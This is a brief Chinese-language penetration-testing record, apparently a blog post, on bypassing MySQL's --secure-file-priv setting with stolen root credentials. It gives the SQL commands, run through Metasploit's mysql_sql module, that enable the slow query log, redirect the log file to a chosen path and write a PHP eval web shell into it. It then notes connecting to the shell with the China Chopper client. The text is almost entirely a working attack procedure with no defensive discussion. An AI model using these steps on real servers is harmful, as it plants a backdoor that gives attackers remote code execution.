关于mysql --secure-file-priv 突破模拟测试记录

前提省略。。。。
（已经获取到mysql的root及密码），进行系统提权时遇到–secure-file-priv 设置。

使用msf的auxiliary/admin/mysql/mysql_sql模块

首先设置slow_query_log=1.即启用慢查询日志(默认禁用)。
set global slow_query_log=1;

接着伪造(修改)slow_query_log_file日志输出文件的绝对路径
set global slow_query_log_file=‘dir\filename’

最后向日志文件写入shell
set SQL select" ‘<?php @eval($_POST[hhh]);?>’ " or sleep(11);

server端查看效果

上菜刀，KO！

备注：以上过程中每步SQL构造完毕进行执行exploit，未截图。